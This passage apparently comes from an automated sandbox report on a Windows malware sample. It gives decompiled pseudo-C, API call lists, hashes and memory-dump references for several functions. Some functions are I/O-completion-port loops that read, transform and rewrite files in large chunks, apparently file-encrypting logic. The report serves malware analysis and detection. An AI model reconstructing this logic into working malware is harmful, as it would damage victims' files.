Opcode ID: c7e12c3b4951909f45bc3b621774f4eb724cfc7defe69e8e5788a1949c709249
Instruction ID: e81ee974abdeb31a631fcea2cba1f4bdd2c2b9091b85bf049a24810229ccf0f4
Opcode Fuzzy Hash: c7e12c3b4951909f45bc3b621774f4eb724cfc7defe69e8e5788a1949c709249
Instruction Fuzzy Hash: B9113C37500108BFDB054FA5EC08FEEBB69FF48361F50C026FA1889020C7369560DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5675, Relevance: 7.5, APIs: 5, Instructions: 48
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE5675(intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				void _v20;

				_v20 = _a4;
				_v16 = _a8;
				_v8 = CreateThread(0, 0, E00CE5650,  &_v20, 0, 0);
				if(_v8 != 0) {
					if(WaitForSingleObject(_v8, 0xfa) != 0x102) {
						GetExitCodeThread(_v8,  &_v12);
					} else {
						TerminateThread(_v8, 0);
						_v12 = 0xffffffff;
					}
					CloseHandle(_v8);
				}
				return _v12;
			}

0x00ce5683
0x00ce5689
0x00ce56a3
0x00ce56aa
0x00ce56bf
0x00ce56dc
0x00ce56c1
0x00ce56c6
0x00ce56cc
0x00ce56cc
0x00ce56e5
0x00ce56e5
0x00ce56f6

APIs

CreateThread.KERNEL32(00000000,00000000,00CE5650,?,00000000,00000000), ref: 00CE569D
WaitForSingleObject.KERNEL32(00000000,000000FA,?,?,00000000), ref: 00CE56B4
TerminateThread.KERNEL32(00000000,00000000,?,?,00000000), ref: 00CE56C6
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 00CE56DC
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00CE56E5

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CloseCodeCreateExitHandleObjectSingleTerminateWait
String ID:
API String ID: 2622483971-0
Opcode ID: db583534a18ce61bfb99e66a1a4b09f33ccd2f47eb85a6d8cac32ef4a71e049e
Instruction ID: 035fdbc68925f83fc537c80ab69a0f8dd8ee0d288c3b335cc9f84dd766cdad51
Opcode Fuzzy Hash: db583534a18ce61bfb99e66a1a4b09f33ccd2f47eb85a6d8cac32ef4a71e049e
Instruction Fuzzy Hash: 0C016930A40208FFEB10CF95DC0ABBEBBB8EB04721F604166F911A22E1DB706B00DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00CE1E9E, Relevance: 7.5, APIs: 5, Instructions: 45
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE1E9E(wchar_t* _a4) {
				signed int _t15;
				void* _t16;

				_t15 = wcslen(_a4);
				_t16 = RtlAllocateHeap( *0xcf0a9e, 0, 2 + _t15 * 2);
				if(_t16 != 0) {
					wcscpy(_t16, _a4);
					_t5 = _t15 + 1; // 0x1
					WideCharToMultiByte(0, 0, _t16, 0xffffffff, _a4, _t5, 0, 0);
					RtlFreeHeap( *0xcf0a9e, 0, _t16);
				}
				return _t15;
			}

0x00ce1eb2
0x00ce1eca
0x00ce1ece
0x00ce1ed4
0x00ce1edd
0x00ce1eef
0x00ce1efe
0x00ce1efe
0x00ce1f0c

APIs

wcslen.NTDLL ref: 00CE1EA9
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00CE1EC4
wcscpy.NTDLL ref: 00CE1ED4
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001,00000000,00000000), ref: 00CE1EEF
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE1EFE

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateByteCharFreeMultiWidewcscpywcslen
String ID:
API String ID: 3152169113-0
Opcode ID: 21e01bb8e62ce88a8f0151419f7e282b60a128470fcd5f2cbbe8e138decbf0e4
Instruction ID: 6a99fba8df00347e592f20e80714df4515dbddcd7d4ccc358225c31b30b84204
Opcode Fuzzy Hash: 21e01bb8e62ce88a8f0151419f7e282b60a128470fcd5f2cbbe8e138decbf0e4
Instruction Fuzzy Hash: 44F0A4322052147FEB115F81EC49FBF3F2DEB44B61F200121FA08991B2DA626924C6A6

Uniqueness

Uniqueness Score: -1.00%

Function 00CE391C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00CE391C(intOrPtr _a4) {
				long _v524;
				intOrPtr _v540;
				char _v560;

				E00CE13DA( &_v524,  &_v524, 0x208);
				E00CE16D5(0xceb0f0,  *0x00CEB0EC);
				E00CE13DA(wcscpy( &_v524, 0xceb0f0), 0xceb0f0,  *((intOrPtr*)(0xceb0ec)));
				E00CE16D5(0xceb09e,  *0x00CEB09A);
				E00CE13DA(wcscat( &_v524, 0xceb09e), 0xceb09e,  *((intOrPtr*)(0xceb09a)));
				E00CE13DA( &_v560,  &_v560, 0x24);
				_v560 = 0x24;
				_v540 = 4;
				E00CE16D5(0xceb086,  *0x00CEB082);
				return E00CE13DA( *0xcf0ec6( &_v524,  &_v560, 0xceb086, _a4), 0xceb086,  *((intOrPtr*)(0xceb082)));
			}

0x00ce3936
0x00ce3945
0x00ce395f
0x00ce396e
0x00ce3988
0x00ce3996
0x00ce399b
0x00ce39a5
0x00ce39b9
0x00ce39e7

APIs

wcscpy.NTDLL ref: 00CE3952
wcscat.NTDLL ref: 00CE397B
CoGetObject.OLE32(?,00000024,?,00CE3A18), ref: 00CE39D0

Strings

$, xrefs: 00CE399B

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Objectwcscatwcscpy
String ID: $
API String ID: 2731547019-3993045852
Opcode ID: 9f4e1dd9a8d1223fc40de35411e9051333410e401eba1bd16293d463f769f1c4
Instruction ID: e0e094583ebc897505a849109324c82e6ed4c365aebf38f78b54117e6642192d
Opcode Fuzzy Hash: 9f4e1dd9a8d1223fc40de35411e9051333410e401eba1bd16293d463f769f1c4
Instruction Fuzzy Hash: 7E1151B6800248BBCB10ABE2EDCEE9FBB7CEB08300F144591F60555422EB7596689B70

Uniqueness

Uniqueness Score: -1.00%

Function 00CE3DF5, Relevance: 6.0, APIs: 4, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE3DF5() {
				short _v524;

				GetModuleFileNameW(0,  &_v524, 0x104);
				wcscpy( &((wcsrchr( &_v524, 0x5c))[0]), 0xcf099a);
				return CreateFileW( &_v524, 0x40000000, 0, 0, 2, 0x80, 0);
			}

0x00ce3e11
0x00ce3e32
0x00ce3e62

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00CE3E11
wcsrchr.NTDLL ref: 00CE3E20
wcscpy.NTDLL ref: 00CE3E32
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00CE3E54

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CreateModuleNamewcscpywcsrchr
String ID:
API String ID: 2372977794-0
Opcode ID: a4a044a9d3886d1772be495324ca4781a3759dd9c8119febb06833a2a24983d9
Instruction ID: a13f902665c97a287152689d8383cdebf4c4efd1aee23797edd40e2735dfd769
Opcode Fuzzy Hash: a4a044a9d3886d1772be495324ca4781a3759dd9c8119febb06833a2a24983d9
Instruction Fuzzy Hash: 96F05B726803047BF6605794AC0FFEB772CD740F12F500151F758E50D2D9A169548AA6

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5EE1, Relevance: 6.0, APIs: 4, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00CE5EE1() {
				int _t54;
				long _t55;
				int _t66;
				intOrPtr _t73;
				int _t78;
				int _t85;
				void* _t92;
				void* _t95;
				void* _t97;

				while(1) {
					L40:
					while(1) {
						L1:
						_t54 = GetQueuedCompletionStatus( *0xcf1028, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
						_t92 =  *(_t95 - 4);
						if(_t54 == 0) {
						}
						L2:
						if( *[fs:0x34] != 0x26) {
							L4:
							CloseHandle( *(_t92 + 0x2c));
							RtlFreeHeap( *0xcf0a9e, 0, _t92);
							while(1) {
								L1:
								_t54 = GetQueuedCompletionStatus( *0xcf1028, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
								_t92 =  *(_t95 - 4);
								if(_t54 == 0) {
								}
								goto L2;
							}
						}
						L3:
						 *(_t92 + 0x30) = 2;
						if(PostQueuedCompletionStatus( *0xcf1028, 0, 0, _t92) != 0) {
							while(1) {
								L1:
								_t54 = GetQueuedCompletionStatus( *0xcf1028, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
								_t92 =  *(_t95 - 4);
								if(_t54 == 0) {
								}
								goto L8;
							}
							goto L2;
						}
						goto L4;
						L8:
						if(_t92 != 0) {
							_t55 =  *(_t92 + 0x30);
							if(_t55 != 0) {
								if(_t55 != 1) {
									if(_t55 != 2) {
										L33:
										if(_t55 != 4) {
											do {
												L40:
												goto L1;
											} while (_t55 != 4);
											L34:
											while( *_t92 == 0x103) {
												Sleep(0);
											}
											if( *0xcf092c != 0) {
												 *0xcf0cfa(_t95 - 0x8c, 0xceb4cc,  *(_t92 + 0x2c));
												_t97 = _t97 + 0xc;
												E00CE3E63( *0xcf092c, 0xceb20a, 0xceb4e8, _t95 - 0x8c, 0);
											}
											CloseHandle( *(_t92 + 0x2c));
											RtlFreeHeap( *0xcf0a9e, 0, _t92); // executed
											InterlockedIncrement(0xcf1044);
											goto L40;
										}
										goto L34;
									}
									 *(_t92 + 8) = 0xffffffff;
									 *(_t92 + 0xc) = 0xffffffff;
									 *(_t92 + 0x30) = 4;
									_t66 = WriteFile( *(_t92 + 0x2c), _t92 + 0x74, 0x90, _t95 - 8, _t92); // executed
									if(_t66 == 0 &&  *[fs:0x34] != 0x3e5) {
										CloseHandle( *(_t92 + 0x2c));
										RtlFreeHeap( *0xcf0a9e, 0, _t92);
									}
									continue;
								}
								E00CE209C(_t92 + 0x34, _t92 + 0x104, _t92 + 0x104,  *(_t95 - 8));
								if( *((intOrPtr*)(_t92 + 0x24)) == 0) {
									_t73 =  *((intOrPtr*)(_t92 + 0x1c));
									if( *((intOrPtr*)(_t92 + 0x20)) != 0xffffffff || _t73 != 0xffffffff) {
										 *(_t92 + 0x14) =  *(_t92 + 0x14) + _t73;
										asm("adc [ebx+0x18], edx");
										 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x28));
										 *(_t92 + 0x30) = 0;
									} else {
										 *(_t92 + 0x30) = 2;
									}
								} else {
									 *(_t92 + 0x14) =  *(_t92 + 0x14) + 0x80000;
									asm("adc dword [ebx+0x18], 0x0");
									 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x24)) - 1;
									 *(_t92 + 0x30) = 0;
								}
								_t78 = WriteFile( *(_t92 + 0x2c), _t92 + 0x104,  *(_t95 - 8), _t95 - 8, _t92); // executed
								if(_t78 == 0 &&  *[fs:0x34] != 0x3e5) {
									CloseHandle( *(_t92 + 0x2c));
									RtlFreeHeap( *0xcf0a9e, 0, _t92);
								}
								continue;
							}
							 *(_t92 + 8) =  *(_t92 + 0x14);
							 *(_t92 + 0xc) =  *(_t92 + 0x18);
							 *(_t92 + 0x30) = 1;
							_t85 = ReadFile( *(_t92 + 0x2c), _t92 + 0x104, 0x80000, _t95 - 8, _t92); // executed
							if(_t85 != 0) {
								L16:
								continue;
							}
							if( *[fs:0x34] != 0x26) {
								if( *[fs:0x34] == 0x3e5) {
									goto L16;
								}
								CloseHandle( *(_t92 + 0x2c));
								RtlFreeHeap( *0xcf0a9e, 0, _t92);
								continue;
							}
							goto L3;
						}
						return _t54;
					}
				}
			}

0x00ce6111
0x00ce6111
0x00ce5e7c
0x00ce5e7c
0x00ce5e90
0x00ce5e96
0x00ce5e9b
0x00ce5e9b
0x00ce5e9d
0x00ce5ea5
0x00ce5ec5
0x00ce5ec8
0x00ce5ed7
0x00ce5e7c
0x00ce5e7c
0x00ce5e90
0x00ce5e96
0x00ce5e9b
0x00ce5e9b
0x00000000
0x00ce5e9b
0x00ce5e7c
0x00ce5ea7
0x00ce5ea7
0x00ce5ec3
0x00ce5e7c
0x00ce5e7c
0x00ce5e90
0x00ce5e96
0x00ce5e9b
0x00ce5e9b
0x00000000
0x00ce5e9b
0x00000000
0x00ce5e7c
0x00000000
0x00ce5eea
0x00ce5eec
0x00ce5ef3
0x00ce5ef8
0x00ce5f73
0x00ce6031
0x00ce6096
0x00ce6099
0x00ce6111
0x00ce6111
0x00000000
0x00ce6111
0x00000000
0x00ce609b
0x00ce60a7
0x00ce60a7
0x00ce60b6
0x00ce60c7
0x00ce60cd
0x00ce60e9
0x00ce60e9
0x00ce60f1
0x00ce6100
0x00ce610b
0x00000000
0x00ce610b
0x00000000
0x00ce6099
0x00ce6033
0x00ce603a
0x00ce6041
0x00ce605b
0x00ce6063
0x00ce6075
0x00ce6084
0x00ce6084
0x00000000
0x00ce6063
0x00ce5f8e
0x00ce5f97
0x00ce5fb0
0x00ce5fb9
0x00ce5fc9
0x00ce5fcc
0x00ce5fd2
0x00ce5fd5
0x00ce5fc0
0x00ce5fc0
0x00ce5fc0
0x00ce5f99
0x00ce5f99
0x00ce5fa0
0x00ce5fa4
0x00ce5fa7
0x00ce5fa7
0x00ce5ff0
0x00ce5ff8
0x00ce600a
0x00ce6019
0x00ce6019
0x00000000
0x00ce5ff8
0x00ce5f00
0x00ce5f03
0x00ce5f06
0x00ce5f23
0x00ce5f2b
0x00ce5f66
0x00000000
0x00ce5f66
0x00ce5f35
0x00ce5f47
0x00000000
0x00000000
0x00ce5f4c
0x00ce5f5b
0x00000000
0x00ce5f5b
0x00000000
0x00ce5f37
0x00ce6119
0x00ce6119
0x00ce5e7c

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,000000FF), ref: 00CE5E90
PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000), ref: 00CE5EBB
CloseHandle.KERNEL32(?), ref: 00CE5EC8
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE5ED7

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: CompletionQueuedStatus$CloseFreeHandleHeapPost
String ID:
API String ID: 3286583680-0
Opcode ID: c4c76c1f79e911f911e2650b015b552a957785519b7be2515470fcf9d60a9e9b
Instruction ID: acd8c1f3382c6dfbbbf787202aca8880822f1d35a7ad6cd1744caa78d22d0335
Opcode Fuzzy Hash: c4c76c1f79e911f911e2650b015b552a957785519b7be2515470fcf9d60a9e9b
Instruction Fuzzy Hash: EDF06271600684EFDB11CF92DC89FBD777DEB08B18F300122E912960A2D734AB44DB02

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5C3A, Relevance: 6.0, APIs: 4, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00CE5C3A() {
				int _t54;
				long _t55;
				intOrPtr _t73;
				void* _t92;
				void* _t95;
				void* _t97;

				while(1) {
					L40:
					while(1) {
						L1:
						_t54 = GetQueuedCompletionStatus( *0xcf1024, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
						_t92 =  *(_t95 - 4);
						if(_t54 == 0) {
						}
						L2:
						if( *[fs:0x34] != 0x26) {
							L4:
							CloseHandle( *(_t92 + 0x2c));
							RtlFreeHeap( *0xcf0a9e, 0, _t92);
							while(1) {
								L1:
								_t54 = GetQueuedCompletionStatus( *0xcf1024, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
								_t92 =  *(_t95 - 4);
								if(_t54 == 0) {
								}
								goto L2;
							}
						}
						L3:
						 *(_t92 + 0x30) = 2;
						if(PostQueuedCompletionStatus( *0xcf1024, 0, 0, _t92) != 0) {
							while(1) {
								L1:
								_t54 = GetQueuedCompletionStatus( *0xcf1024, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
								_t92 =  *(_t95 - 4);
								if(_t54 == 0) {
								}
								goto L8;
							}
							goto L2;
						}
						goto L4;
						L8:
						if(_t92 != 0) {
							_t55 =  *(_t92 + 0x30);
							if(_t55 != 0) {
								if(_t55 != 1) {
									if(_t55 != 2) {
										L33:
										if(_t55 != 4) {
											do {
												L40:
												goto L1;
											} while (_t55 != 4);
											L34:
											while( *_t92 == 0x103) {
												Sleep(0);
											}
											if( *0xcf092c != 0) {
												 *0xcf0cfa(_t95 - 0x8c, 0xceb4cc,  *(_t92 + 0x2c));
												_t97 = _t97 + 0xc;
												E00CE3E63( *0xcf092c, 0xceb20a, 0xceb4e8, _t95 - 0x8c, 0);
											}
											CloseHandle( *(_t92 + 0x2c));
											RtlFreeHeap( *0xcf0a9e, 0, _t92);
											InterlockedIncrement(0xcf103c);
											goto L40;
										}
										goto L34;
									}
									 *(_t92 + 8) = 0xffffffff;
									 *(_t92 + 0xc) = 0xffffffff;
									 *(_t92 + 0x30) = 4;
									if(WriteFile( *(_t92 + 0x2c), _t92 + 0x74, 0x90, _t95 - 8, _t92) == 0 &&  *[fs:0x34] != 0x3e5) {
										CloseHandle( *(_t92 + 0x2c));
										RtlFreeHeap( *0xcf0a9e, 0, _t92);
									}
									continue;
								}
								E00CE209C(_t92 + 0x34, _t92 + 0x104, _t92 + 0x104,  *(_t95 - 8));
								if( *((intOrPtr*)(_t92 + 0x24)) == 0) {
									_t73 =  *((intOrPtr*)(_t92 + 0x1c));
									if( *((intOrPtr*)(_t92 + 0x20)) != 0xffffffff || _t73 != 0xffffffff) {
										 *(_t92 + 0x14) =  *(_t92 + 0x14) + _t73;
										asm("adc [ebx+0x18], edx");
										 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x28));
										 *(_t92 + 0x30) = 0;
									} else {
										 *(_t92 + 0x30) = 2;
									}
								} else {
									 *(_t92 + 0x14) =  *(_t92 + 0x14) + 0x80000;
									asm("adc dword [ebx+0x18], 0x0");
									 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x24)) - 1;
									 *(_t92 + 0x30) = 0;
								}
								if(WriteFile( *(_t92 + 0x2c), _t92 + 0x104,  *(_t95 - 8), _t95 - 8, _t92) == 0 &&  *[fs:0x34] != 0x3e5) {
									CloseHandle( *(_t92 + 0x2c));
									RtlFreeHeap( *0xcf0a9e, 0, _t92);
								}
								continue;
							}
							 *(_t92 + 8) =  *(_t92 + 0x14);
							 *(_t92 + 0xc) =  *(_t92 + 0x18);
							 *(_t92 + 0x30) = 1;
							if(ReadFile( *(_t92 + 0x2c), _t92 + 0x104, 0x80000, _t95 - 8, _t92) != 0) {
								L16:
								continue;
							}
							if( *[fs:0x34] != 0x26) {
								if( *[fs:0x34] == 0x3e5) {
									goto L16;
								}
								CloseHandle( *(_t92 + 0x2c));
								RtlFreeHeap( *0xcf0a9e, 0, _t92);
								continue;
							}
							goto L3;
						}
						return _t54;
					}
				}
			}

0x00ce5e6a
0x00ce5e6a
0x00ce5bd5
0x00ce5bd5
0x00ce5be9
0x00ce5bef
0x00ce5bf4
0x00ce5bf4
0x00ce5bf6
0x00ce5bfe
0x00ce5c1e
0x00ce5c21
0x00ce5c30
0x00ce5bd5
0x00ce5bd5
0x00ce5be9
0x00ce5bef
0x00ce5bf4
0x00ce5bf4
0x00000000
0x00ce5bf4
0x00ce5bd5
0x00ce5c00
0x00ce5c00
0x00ce5c1c
0x00ce5bd5
0x00ce5bd5
0x00ce5be9
0x00ce5bef
0x00ce5bf4
0x00ce5bf4
0x00000000
0x00ce5bf4
0x00000000
0x00ce5bd5
0x00000000
0x00ce5c43
0x00ce5c45
0x00ce5c4c
0x00ce5c51
0x00ce5ccc
0x00ce5d8a
0x00ce5def
0x00ce5df2
0x00ce5e6a
0x00ce5e6a
0x00000000
0x00ce5e6a
0x00000000
0x00ce5df4
0x00ce5e00
0x00ce5e00
0x00ce5e0f
0x00ce5e20
0x00ce5e26
0x00ce5e42
0x00ce5e42
0x00ce5e4a
0x00ce5e59
0x00ce5e64
0x00000000
0x00ce5e64
0x00000000
0x00ce5df2
0x00ce5d8c
0x00ce5d93
0x00ce5d9a
0x00ce5dbc
0x00ce5dce
0x00ce5ddd
0x00ce5ddd
0x00000000
0x00ce5dbc
0x00ce5ce7
0x00ce5cf0
0x00ce5d09
0x00ce5d12
0x00ce5d22
0x00ce5d25
0x00ce5d2b
0x00ce5d2e
0x00ce5d19
0x00ce5d19
0x00ce5d19
0x00ce5cf2
0x00ce5cf2
0x00ce5cf9
0x00ce5cfd
0x00ce5d00
0x00ce5d00
0x00ce5d51
0x00ce5d63
0x00ce5d72
0x00ce5d72
0x00000000
0x00ce5d51
0x00ce5c59
0x00ce5c5c
0x00ce5c5f
0x00ce5c84
0x00ce5cbf
0x00000000
0x00ce5cbf
0x00ce5c8e
0x00ce5ca0
0x00000000
0x00000000
0x00ce5ca5
0x00ce5cb4
0x00000000
0x00ce5cb4
0x00000000
0x00ce5c90
0x00ce5e72
0x00ce5e72
0x00ce5bd5

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,000000FF), ref: 00CE5BE9
PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000), ref: 00CE5C14
CloseHandle.KERNEL32(?), ref: 00CE5C21
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE5C30

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: CompletionQueuedStatus$CloseFreeHandleHeapPost
String ID:
API String ID: 3286583680-0
Opcode ID: d30c2cdc29f7edeb59ec39612115ed79740a9c7f517e63f50101897acb25e2c1
Instruction ID: cedbc9d8ea4bdfa4fe9815cce2a928b38a0b31870ac59e48fdd5903545323ed9
Opcode Fuzzy Hash: d30c2cdc29f7edeb59ec39612115ed79740a9c7f517e63f50101897acb25e2c1
Instruction Fuzzy Hash: 0CF0F971500A88EBDB159F92DD89FBE7779FB18B54F3001A1EA12D50A2D730AA40DB06

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5CC4, Relevance: 6.0, APIs: 4, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00CE5CC4() {
				int _t54;
				long _t55;
				intOrPtr _t73;
				void* _t92;
				void* _t95;
				void* _t97;

				while(1) {
					L39:
					while(1) {
						L1:
						_t54 = GetQueuedCompletionStatus( *0xcf1024, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
						_t92 =  *(_t95 - 4);
						if(_t54 == 0) {
						}
						L2:
						if( *[fs:0x34] != 0x26) {
							L4:
							CloseHandle( *(_t92 + 0x2c));
							RtlFreeHeap( *0xcf0a9e, 0, _t92);
							while(1) {
								L1:
								_t54 = GetQueuedCompletionStatus( *0xcf1024, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
								_t92 =  *(_t95 - 4);
								if(_t54 == 0) {
								}
								goto L2;
							}
						}
						L3:
						 *(_t92 + 0x30) = 2;
						if(PostQueuedCompletionStatus( *0xcf1024, 0, 0, _t92) != 0) {
							while(1) {
								L1:
								_t54 = GetQueuedCompletionStatus( *0xcf1024, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
								_t92 =  *(_t95 - 4);
								if(_t54 == 0) {
								}
								goto L7;
							}
							goto L2;
						}
						goto L4;
						L7:
						if(_t92 != 0) {
							_t55 =  *(_t92 + 0x30);
							if(_t55 != 0) {
								if(_t55 != 1) {
									if(_t55 != 2) {
										L32:
										if(_t55 != 4) {
											do {
												L39:
												goto L1;
											} while (_t55 != 4);
											L33:
											while( *_t92 == 0x103) {
												Sleep(0);
											}
											if( *0xcf092c != 0) {
												 *0xcf0cfa(_t95 - 0x8c, 0xceb4cc,  *(_t92 + 0x2c));
												_t97 = _t97 + 0xc;
												E00CE3E63( *0xcf092c, 0xceb20a, 0xceb4e8, _t95 - 0x8c, 0);
											}
											CloseHandle( *(_t92 + 0x2c));
											RtlFreeHeap( *0xcf0a9e, 0, _t92);
											InterlockedIncrement(0xcf103c);
											goto L39;
										}
										goto L33;
									}
									 *(_t92 + 8) = 0xffffffff;
									 *(_t92 + 0xc) = 0xffffffff;
									 *(_t92 + 0x30) = 4;
									if(WriteFile( *(_t92 + 0x2c), _t92 + 0x74, 0x90, _t95 - 8, _t92) == 0 &&  *[fs:0x34] != 0x3e5) {
										CloseHandle( *(_t92 + 0x2c));
										RtlFreeHeap( *0xcf0a9e, 0, _t92);
									}
									continue;
								}
								E00CE209C(_t92 + 0x34, _t92 + 0x104, _t92 + 0x104,  *(_t95 - 8));
								if( *((intOrPtr*)(_t92 + 0x24)) == 0) {
									_t73 =  *((intOrPtr*)(_t92 + 0x1c));
									if( *((intOrPtr*)(_t92 + 0x20)) != 0xffffffff || _t73 != 0xffffffff) {
										 *(_t92 + 0x14) =  *(_t92 + 0x14) + _t73;
										asm("adc [ebx+0x18], edx");
										 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x28));
										 *(_t92 + 0x30) = 0;
									} else {
										 *(_t92 + 0x30) = 2;
									}
								} else {
									 *(_t92 + 0x14) =  *(_t92 + 0x14) + 0x80000;
									asm("adc dword [ebx+0x18], 0x0");
									 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x24)) - 1;
									 *(_t92 + 0x30) = 0;
								}
								if(WriteFile( *(_t92 + 0x2c), _t92 + 0x104,  *(_t95 - 8), _t95 - 8, _t92) == 0 &&  *[fs:0x34] != 0x3e5) {
									CloseHandle( *(_t92 + 0x2c));
									RtlFreeHeap( *0xcf0a9e, 0, _t92);
								}
								continue;
							}
							 *(_t92 + 8) =  *(_t92 + 0x14);
							 *(_t92 + 0xc) =  *(_t92 + 0x18);
							 *(_t92 + 0x30) = 1;
